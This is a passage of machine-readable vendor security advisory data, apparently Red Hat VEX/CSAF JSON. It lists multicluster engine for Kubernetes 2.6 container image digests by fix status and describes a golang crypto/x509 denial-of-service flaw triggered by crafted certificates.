2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2418462"}], "notes": [{"category": "description", "text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.", "title": "Vulnerability description"}, {"category": "summary", "text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 